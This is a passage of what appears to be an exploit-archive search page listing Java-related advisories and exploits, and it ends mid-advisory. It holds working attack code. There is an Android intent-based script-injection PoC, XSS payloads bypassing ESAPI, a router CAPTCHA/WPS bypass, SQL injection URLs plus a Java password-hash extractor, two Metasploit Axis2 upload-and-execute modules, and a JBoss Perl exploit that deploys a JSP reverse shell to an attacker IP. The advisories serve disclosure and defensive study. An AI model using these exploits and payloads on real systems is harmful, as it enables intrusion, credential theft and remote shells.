Java
Search result for 'Java'
(0.0436820983887 seconds)
Yair Amit/Dolphin Browser HD Cross Application Scripting ( na)
1 Background
============
Android applications are executed in a sandbox environment, to ensure that no
application can access sensitive information held by another, without adequate
privileges. For example, the Dolphin browser application holds sensitive
information such as cookies, cache and history, and this cannot be accessed
by third-party apps. An android app may request specific privileges during
its installation; if granted by the user, the app's capabilities are extended.
Intents are used by Android apps for intercommunication. These objects can be
broadcast, passed to the startActivity call (when an application starts another
activity), or passed to the startService call (when an application starts a
service). Normally, when startActivity is called, the target activity's
onCreate method is executed. However, under AndroidManifest.xml it is possible
to define different launch tags, which affect this behavior. One example is the
singleTask launch tag, which makes the activity act as a singleton. This affects
the startActivity call: if the activity has already been started when the call
is made, the activity's onNewIntent member function is called instead of its
onCreate method.
2 Vulnerability
===============
A 3rd party application may exploit Dolphin Browser HD's URL loading process in
order to inject JavaScript code into an arbitrary domain thus break Android's
sandboxing. This can be done by sending two consecutive startActivity calls. The
first call includes the attacked domain, and causes Dolphin Browser HD to load
it, while the second call contains JavaScript code. the JavaScript URI will be
opened under the current tab, i.e. the attacked domain.
3 Impact
========
By exploiting this vulnerability a malicious, non-privileged application may
inject JavaScript code into the context of any domain; therefore, this
vulnerability has the same implications as global XSS, albeit from an installed
application rather than another website. Additionally, an application may
install itself as a service, in order to inject JavaScript code from time to
time into the currently opened tab, thus completely intercepting the user's
browsing experience.
4 Proof-of-Concept
==================
The following is a PoC for the second technique:
public class CasExploit extends Activity
{
static final String mPackage = "mobi.mgeek.TunnyBrowser";
static final String mClass = "BrowserActivity";
static final String mUrl = "http://target.domain/";
static final String mJavascript = "alert(document.cookie)";
static final int mSleep = 15000;
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
startBrowserActivity(mUrl);
try {
Thread.sleep(mSleep);
}
catch (InterruptedException e) {}
startBrowserActivity("javascript:" + mJavascript);
}
private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
res.setData(Uri.parse(url));
startActivity(res);
}
}
5 Vulnerable versions
=====================
Dolphin Browser HD 6.0.0 has been found vulnerable.
6 Vendor Response
=================
Dolphin Browser HD 6.1.0 has been released to Android Market, which incorporates
a fix for this bug.
8 Credit
========
* Roee Hay <roeeh@il.ibm.com>
* Yair Amit <yairam@gmail.com>
9 References
============
* Original advisory: http://blog.watchfire.com/files/advisory-dolphin.pdf
* Blog post:
http://blog.watchfire.com/wfblog/2011/09/dolphin-browser-hd-cross-application-scripting.html
* Demo of the PoC: http://youtu.be/1E0GzZPdpLM
* Android Browser Cross-Application Scripting (CVE-2011-2357):
http://blog.watchfire.com/files/advisory-android-browser.pdf
10 Acknowledgments
==================
We would like to thank the Dolphin Browser team for the efficient and quick way
in which it handled this security issue.
Dolphin Browser HD versions prior to 6.1.0 suffer from a cross applications scripting vulnerability.
Inferno from Secure Thoughts/OWASP ESAPI XSS Bypass ( na)
Bypassing OWASP ESAPI XSS Protection inside Javascript
------------------------------------------------------
By Inferno (inferno {at} securethoughts {dot} com)
Everyone knows the invaluable XSS cheat sheet maintained by "RSnake". It is
all about breaking things and features all the scenarios that can result in
XSS. To complement his efforts, there is an excellent XSS prevention cheat
sheet created by "Jeff Williams" (Founder and CEO, Aspect Security). As far
as I have seen, this wiki page provides the most comprehensive information
on protecting yourself from XSS on the internet. It advises using the OWASP
ESAPI api to mitigate any XSS arising from untrusted user input.
I was evaluating this ESAPI api and the recommendations given on the wiki to
see if there are any potential flaws. Any weakness impacts a very large
number of users since many developers are using it to strengthen their web
applications throughout the world. This is my way of contributing back to
the community, but can never match the immense efforts put by Jeff and other
OWASP team members in developing this library.
I want to give you a little bit of background before diving into the real
vulnerability. The XSS prevention cheat sheet classifies XSS protections by
dividing them into broadly four buckets - HTML Body injection, HTML
Attribute injection, Javascript injection and CSS injection. For each of
these four buckets, there is an ESAPI function reference you can use for
output escaping/encoding.
If you allow any untrusted user input into javascript functions
document.write() OR eval(), it can still execute the XSS even after you do
the scrubbing using the ESAPI encodeForJavaScript() function. The reason
being that hex escaped chars are converted back into normal chars at the
time of execution of these functions.
Here is the proof of concept jsp code:
01.<%@page import="org.owasp.esapi.*"%>
02.
03.<%@page contentType="text/html" pageEncoding="UTF-8"%>
04.<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
05. "http://www.w3.org/TR/html4/loose.dtd">
06.
07.<html>
08. <head>
09. <meta http-equiv="Content-Type" content="text/html;
charset=UTF-8">
10. <title>ESAPI XSS Protection Bypass</title>
11. </head>
12. <body>
13. <h1>ESAPI XSS Protection Bypass</h1>
14. <p id="tb1"/><br>
15. <p id="tb2"/>
16. <script>
17. //in real scenario, these three strings come from
request.getParameter or user input
18. <%
19. String vulstr1 = "-1';alert(0);";
20. String vulstr2 = "<img src=x onerror=alert(1)>";
21. String vulstr3 = "0,x setter=alert,x=2";
22. %>
23.
24. // you can safely use it in places like this
25. // Ex. vulstr1 is completely encapsulated in a and alert(0)
not executed.
26. var a='<%= ESAPI.encoder().encodeForJavaScript(vulstr1) %>';
27. alert(a);
28.
29. // However, you can bypass protection in places like these
30. // Ex. vulstr2 gets written to html and alert(1) executes
31. document.write("<%=
ESAPI.encoder().encodeForJavaScript(vulstr2) %>");
32. // Ex. part of vulstr3 get assigned to u, rest alert(2)
executes
33. eval("u=<%= ESAPI.encoder().encodeForJavaScript(vulstr3)
%>");
34. </script>
35. </body>
36.</html>
Much thanks to Jeremiah Grossman and Jeff Williams for taking the time to
review my idea and providing their insights. Jeremiah told me that he has
seen such injections from time to time at WhiteHat and these do exist in the
wild.
Jeff confirmed that some documentation changes will fix this. I agree that
no esapi code change is required, because function themselves are not
insecure.
But, if you are currently using esapi functions inside your javascript code,
it is important that you re-review your javascript code and the places where
your make calls to esapi functions.
If you use the esapi function encodeForJavaScript() inside document.write,
it is advised that you change them with other appropriate esapi functions
depending on the context where the data is ultimately landing. For example,
if you have document.write("<script>alert('XSS')</script>"), you know the
data is landing in html body context, so it is appropriate to use
encodeForHTML() wrapper. Using user input inside eval is less common, but
more disastrous. The reason for this is you can still begin another command
context using , and (space) char and it won't be encoded by function
encodeForHTML(). So, it is better to avoid putting user input inside eval.
Any more suggestions or discussion on fixes is highly welcome.
Thanks and Regards,
Inferno
Security Researcher
SecureThoughts.com
A bypass vulnerability exists against the cross site scripting protection in the OWASP ESAPI.
/D-Link CAPTCHA Bypass ( na)
D-Link Captcha Partially Broken
May 12th, 2009
Hack-A-Day reported on D-Link’s new captcha system designed to protect against malware that alters DNS settings by logging in to the router using default administrative credentials. I downloaded the new firmware onto our DIR-628 to take a look, and quickly found a flaw in the captcha authentication system that allows an attacker to glean your WiFi WPA pass phrase from the router with only user-level access, and without properly solving the captcha.
When you login with the captcha enabled, the request looks like this:
GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52F&auth_id=268D2
The hash is a salted MD5 hash of your password, the auth_code is the captcha value that you entered, and the auth_id is unique to the captcha image that you viewed (this presumably allows the router to check the auth_code against the proper captcha image). The problem is that if you leave off the auth_code and auth_id values, some pages in the D-Link Web interface think that you’ve properly authenticated, as long as you get the hash right:
GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a
Most notably, once you’ve made the request to post_login.xml, you can activate WPS with the following request:
GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0
When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and retrieve the WPA passphrase directly from the router.
Further, one need not log in with Administrative credentials to perform this attack; only User-level access is required to activate WPS. This means that even if you load the new firmware on your router, use a strong WPA pass phrase, and change your Administrative login, an attacker can still activate WPS and gain access to your wireless network by simply having an internal client view a Web page.
The attack works like this:
1. The attacker uses DNS load balancing to bypass the browser’s same-domain restrictions. This allows his JavaScript code to access the router’s index page and glean the salt generated by the router.
2. The attacker’s JavaScript uses the salt to generate a login hash for the D-Link User account (blank password by default).
3. The attacker’s JavaScript sends the hash to the post_login.xml page.
4. The attacker’s JavaScript sends a request to the wifisc_add_sta.xml page, activating WPS.
5. The attacker uses WPSpy to detect when the victim’s router is looking for WPS clients, and connects to the WiFi network using a WPS-capable network card.
So what you basically have is a combination of our previously described DNS load balancing and CSRF-based WPS attacks that results in a captcha bypass, privilage escalation, and a WPA crack, all with just a little JavaScript and some phishing.
A flaw in the D-Link CAPTCHA authentication system allows an attacker to glean your WiFi WPA pass phrase from the router with only user-level access, and without properly solving the CAPTCHA.
BaCkSpAcE/yabbSE.txt ( na)
Summary:
YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another
bulletin board). An SQL Injection vulnerability in the product allows a
remote attacker to insert malicious SQL statements.
Details:
Vulnerable Systems:
Yabb Se version 1.5.4 (tested), 1.5.3(tested) maybe others
Immune Systems:
Yabb Se version 1.5.5
Technical Details:
the file SSI.php has a number of functions that return some information
about the status of the forum like recent topics, boards statistics and so
on. Functions welcome and recentTopics are vulnerable to SQL injection
because the parameter ID_MEMBER is not checked against malicious input.
Example:
http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=2)+WHERE+m.ID_MSG+IN+(2,1)+AND+t.ID_TOPIC=m.ID_TOPIC+AND+b.ID_BOARD=t.ID_BOARD+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
OR
http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
those requests return a page showing all usernames and hashed passwords.
[General Discussion] test post by test January 01, 2001, 03:00:01 pm
[] admin by [hashed pass] January 01, 1970, 01:00:01 am
[] test_user by [hashed pass] January 01, 1970, 01:00:02 am
http://vulnhost/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(SUBSTRING(realName,1,1)+)+,+0+FROM+yabbse_members+WHERE+ID_MEMBER=1/*
this request return the value of the first character from the realName of
the user whose ID_MEMBER is 1.
Proof of concept code:
/*
* YabbSe SQL Injection test code
* The code is very ugly but it works OK
* Use at your own risk.
* compile:
* javac yabb.java
* exec:
* java yabb http://localhost/yabbse/yabbse154/ yabbse_ 1
* parameters are:
* java yabb [url with path] [database_prefix] [ID_MEMBER]
*/
import java.net.*;
import java.io.*;
public class yabb {
public static void main(String[] args) throws Exception {
boolean lastChar = false;
String Key = "";
for ( int count=1; count <= 32 ; count++)
{
URL yabbForum = new URL(args[0] +
"SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1%20OR%201=2)%20GROUP
%20BY%20readBy%20UNION%20SELECT%20ASCII(SUBSTRING(passwd,"+count+",1)%20)%20
%20,%20%200%20FROM%20"+args[1]+"members%20WHERE%20ID_MEMBER="+args[2]+"/*");
BufferedReader in = new BufferedReader(new
InputStreamReader(yabbForum.openStream()));
String inputLine;
inputLine = in.readLine();
int pos = inputLine.indexOf("action=im");
int pos2 = inputLine.indexOf(" ", pos + 11);
if ( pos < 0 )
{
System.out.println("ERROR: The server doesn't return any data");
System.exit(0);
}
String theNumber = inputLine.substring( pos + 11, pos2);
System.out.println(theNumber + "-" + new
Character((char)Integer.parseInt(theNumber.trim())).toString());
Key += new Character((char)Integer.parseInt(theNumber.trim())).toString();
in.close();
}
System.out.println("Hashed password : " + Key);
}
}
Vendor status:
The vendor was contacted and the vulnerabilities were fixed.
Solution:
Upgrade to version 1.5.5
Credits:
Credits go to BackSpace
YaBB SE versions 1.54 and 1.53 have the functions welcome and recentTopics which are vulnerable to SQL injection because the parameter ID_MEMBER is not checked against malicious input.
metasploit/Axis2 Authenticated Code Execution (via REST) ( multiple)
##
# $Id: axis2_deployer_rest.rb 11330 2010-12-14 17:26:44Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 Authenticated Code Execution (via REST)',
'Version' => '$Revision: 11330 $',
'Description' => %q{
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
and uploads and executes commands via deploying a malicious web service by using REST.
},
'References' =>
[
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux X86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]),
OptString.new('PATH', [ true, "The URI path of the axis2 app", '/axis2'])
], self.class)
register_autofilter_ports([ 8080 ])
end
def upload_exec(session)
contents=''
name = Rex::Text.rand_text_alpha(8)
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}
</description>
<messageReceivers>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</messageReceivers>
<parameter name="ServiceClass">
metasploit.PayloadServlet
</parameter>
</service>
}
if target.name =~ /Java/
zip = payload.encoded_jar
zip.add_file("META-INF/services.xml", services_xml)
# We need this class as a wrapper to run in a thread. For some reason
# the Payload class is giving illegal access exceptions without it.
path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class")
fd = File.open(path, "rb")
servlet = fd.read(fd.stat.size)
fd.close
zip.add_file("metasploit/PayloadServlet.class", servlet)
contents = zip.pack
else
end
boundary = rand_text_alphanumeric(6)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; "
data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
data << contents
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-admin/upload",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if (res and res.code == 200)
print_status("Successfully uploaded")
else
print_error("Error uploading #{res}")
return
end
=begin
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
puts res.body
puts res.code
if res.code > 200 and res.code < 300
if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
puts dir
else
if ( a.scan(/catalina\.home<\/th><td style=".*">(.*) <\/td>/i) )
dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
puts dir
end
end
end
=end
print_status("Polling to see if the service is ready")
# Try to execute the payload
1.upto 5 do
Rex::ThreadSafe.sleep(3)
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/services/#{name}/run",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if res.code >= 200 and res.code < 300
# This should usually mean we got a shell
break
end
end
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
path = datastore['PATH']
success = false
srvhdr = '?'
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/#{path}/axis2-admin/login",
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
if not (res.kind_of? Rex::Proto::Http::Response)
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding")
end
if res.code == 404
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404")
end
srvhdr = res.headers['Server']
if res.code == 200
# Could go with res.headers["Server"] =~ /Apache-Coyote/i
# as well but that seems like an element someone's more
# likely to change
success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
session = $1
end
end
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication")
end
if success
print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
upload_exec(session)
else
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
end
end
end
Kingcope/JBoss Application Server Remote Exploit ( jsp)
#JBoss AS Remote Exploit
#by Kingcope
#####
use IO::Socket;
use LWP::UserAgent;
use URI::Escape;
use MIME::Base64;
sub usage {
print "JBoss AS Remote Exploit\nby Kingcope\n\nusage: perl jboss.pl <target> <targetport> <yourip> <yourport> <win/lnx>\n";
print "example: perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx\n";
exit;
}
if ($#ARGV != 4) { usage; }
$host = $ARGV[0];
$port = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$com = $ARGV[4];
if ($com eq "lnx") {
$comspec = "/bin/sh";
}
if ($com eq "win") {
$comspec = "cmd.exe";
}
$|=1;
$jsp="
<%@
page import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"
%>
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
%>
<%
try
{
Socket socket = new Socket( \"$myip\", $myport );
Process process = Runtime.getRuntime().exec( \"$comspec\" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>";
#print $jsp;exit;
srand(time());
sub randstr
{
my $length_of_randomstring=shift;# the length of
# the random string to generate
my @chars=('a'..'z','A'..'Z','0'..'9','_');
my $random_string;
foreach (1..$length_of_randomstring)
{
# rand @chars will generate a random
# number between 0 and scalar @chars
$random_string.=$chars[rand @chars];
}
return $random_string;
}
$appbase = randstr(8);
$jspname = randstr(8);
print "APPBASE=$appbase\nJSPNAME=$jspname\n";
$bsh_script =
qq{import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;
String val = "} . encode_base64($jsp, "") . qq{";
BASE64Decoder decoder = new BASE64Decoder();
String jboss_home = System.getProperty("jboss.server.home.dir");
new File(jboss_home + "/deploy/} . $appbase . ".war" . qq{").mkdir();
byte[] byteval = decoder.decodeBuffer(val);
String jsp_file = jboss_home + "/deploy/} . $appbase . ".war/" . $jspname . ".jsp" . qq{";
FileOutputStream fstream = new FileOutputStream(jsp_file);
fstream.write(byteval);
fstream.close(); };
#
# UPLOAD
#
$params = 'action=invokeOpByName&name=jboss.deployer:service=BSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=' . uri_escape($bsh_script)
.
'&argType=java.lang.String&arg1=' . randstr(8) . '.bsh';
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");
my $req = HTTP::Request->new(POST => "http://$host:$port/jmx-console/HtmlAdaptor");
$req->content_type('application/x-www-form-urlencoded');
$req->content($params);
print "UPLOAD... ";
my $res = $ua->request($req);
if ($res->is_success) {
print "SUCCESS\n";
print "EXECUTE";
sleep(5);
$uri = '/' . $appbase . '/' . $jspname . '.jsp';
for ($k=0;$k<10;$k++) {
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");
my $req = HTTP::Request->new(GET => "http://$host:$port$uri");
my $res = $ua->request($req);
if ($res->is_success) {
print "\nSUCCESS\n";
exit;
} else {
print ".";
# print $res->status_line."\n";
sleep(5);
}
}
print "UNSUCCESSFUL\n";
}
else {
print "UNSUCCESSFUL\n";
print $res->status_line, "\n";
exit;
}
Joshua D. Abraham/Axis2 Upload Exec (via REST) ( na)
##
# $Id: axis2_deployer_rest.rb 11178 2010-11-30 18:17:33Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 Upload Exec (via REST)',
'Version' => '$Revision: 11178 $',
'Description' => %q{
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
and uploads and executes commands via deploying a malicious web service by using REST.
},
'References' =>
[
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux X86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]),
OptString.new('PATH', [ true, "The URI path of the axis2 app", '/axis2'])
], self.class)
register_autofilter_ports([ 8080 ])
end
def upload_exec(session)
contents=''
name = Rex::Text.rand_text_alpha(8)
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}
</description>
<messageReceivers>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</messageReceivers>
<parameter name="ServiceClass">
metasploit.PayloadServlet
</parameter>
</service>
}
if target.name =~ /Java/
zip = payload.encoded_jar
zip.add_file("META-INF/services.xml", services_xml)
# We need this class as a wrapper to run in a thread. For some reason
# the Payload class is giving illegal access exceptions without it.
path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class")
fd = File.open(path, "rb")
servlet = fd.read(fd.stat.size)
fd.close
zip.add_file("metasploit/PayloadServlet.class", servlet)
contents = zip.pack
else
end
boundary = rand_text_alphanumeric(6)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; "
data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
data << contents
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-admin/upload",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if (res and res.code == 200)
print_status("Successfully uploaded")
else
print_error("Error uploading #{res}")
return
end
=begin
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
puts res.body
puts res.code
if res.code > 200 and res.code < 300
if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
puts dir
else
if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) )
dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
puts dir
end
end
end
=end
print_status("Polling to see if the service is ready")
# Try to execute the payload
1.upto 5 do
Rex::ThreadSafe.sleep(3)
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/services/#{name}/run",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if res.code >= 200 and res.code < 300
# This should usually mean we got a shell
break
end
end
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
path = datastore['PATH']
success = false
srvhdr = '?'
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/#{path}/axis2-admin/login",
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
if not (res.kind_of? Rex::Proto::Http::Response)
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding")
end
if res.code == 404
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404")
end
srvhdr = res.headers['Server']
if res.code == 200
# Could go with res.headers["Server"] =~ /Apache-Coyote/i
# as well but that seems like an element someone's more
# likely to change
success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
session = $1
end
end
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication")
end
if success
print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
upload_exec(session)
else
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
end
end
end
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
Roberto Suggi Liverani/Google Analytics Stored Cross Site Scripting ( na)
======================================================
=================
= Google Analytics - Stored Cross Site Scripting
Vulnerability
=
= Vendor Website:
= http://www.google.com
=
= Affected Version:
= -- http://www.google.com/analytics/
=
= Public disclosure on 8th December 2008
=
======================================================
==================
Available online at:
http://www.security-assessment.com/files/advisories/20
08-12-08_Google_Analytics_Stored_Cross_Site_Scripting.
pdf
== Issue Details ==
Security-Assessment.com recently conducted a security
review of the Google Analytics service, provided by
Google Inc. Analysis discovered a stored Cross Site
Scripting (XSS) vulnerability present in the Analytics
web application. A malicious user is able to inject
arbitrary browser content through web sites subscribed
to the Google Analytics service. The script content
injected was rendered into the Google Analytics
Content Detail page which uses an Ajax-based menu to
list the URL and the number of page views of the
visited pages.
The following URL points to the Google Analytics
Content Detail page:
URL:
https://www.google.com/analytics/reporting/content_det
ail
JavaScript Vulnerable:
goog.analytics.PropertyManager._getInstance()._broadca
stChange()
== Exploit Description - Attacker ==
A malicious user visits site xxx.com which is
subscribed to the Google Analytics service and employs
the Google Analytics JavaScript tracking code. The
attacker performs the following request which includes
the Cross Site Scripting payload and the Google
Analytics JavaScript function broadcastChange():
Malicious GET Request:
http://xxx.com/search.asp?keyword=test");
alert(document.cookie);
goog.analytics.PropertyManager._getInstance()._broadca
stChange("drilldown","/search.asp?keyword=test")
In the example above, the broadcastChange function is
used to terminate the malicious payload injection and
to make the victim's browser execute the malicious
script with no errors.
The web server responds with HTTP Status 200. The URL
of the page requested and the Cross Site Scripting
payload is passed to the Google Analytics service
through the JavaScript tracking code.
The injected script content results as the following
HTML being generated by the Google Analytics Content
Detail page:
<a title='/search.asp?keyword=test");
alert(document.cookie);
goog.analytics.PropertyManager._getInstance()._broadca
stChange("drilldown","/search.asp?keyword=test'
href='javascript:goog.analytics.PropertyManager._getIn
stance()._broadcastChange
("drilldown","/search.asp?keyword=test");
alert(document.cookie);
goog.analytics.PropertyManager._getInstance()._broadca
stChange("drilldown","/search.asp?keyword=test")'>
/search.asp?keyword=test"); alert(document.cookie);
goog.analytics.PropertyManager._getInstance()._broadca
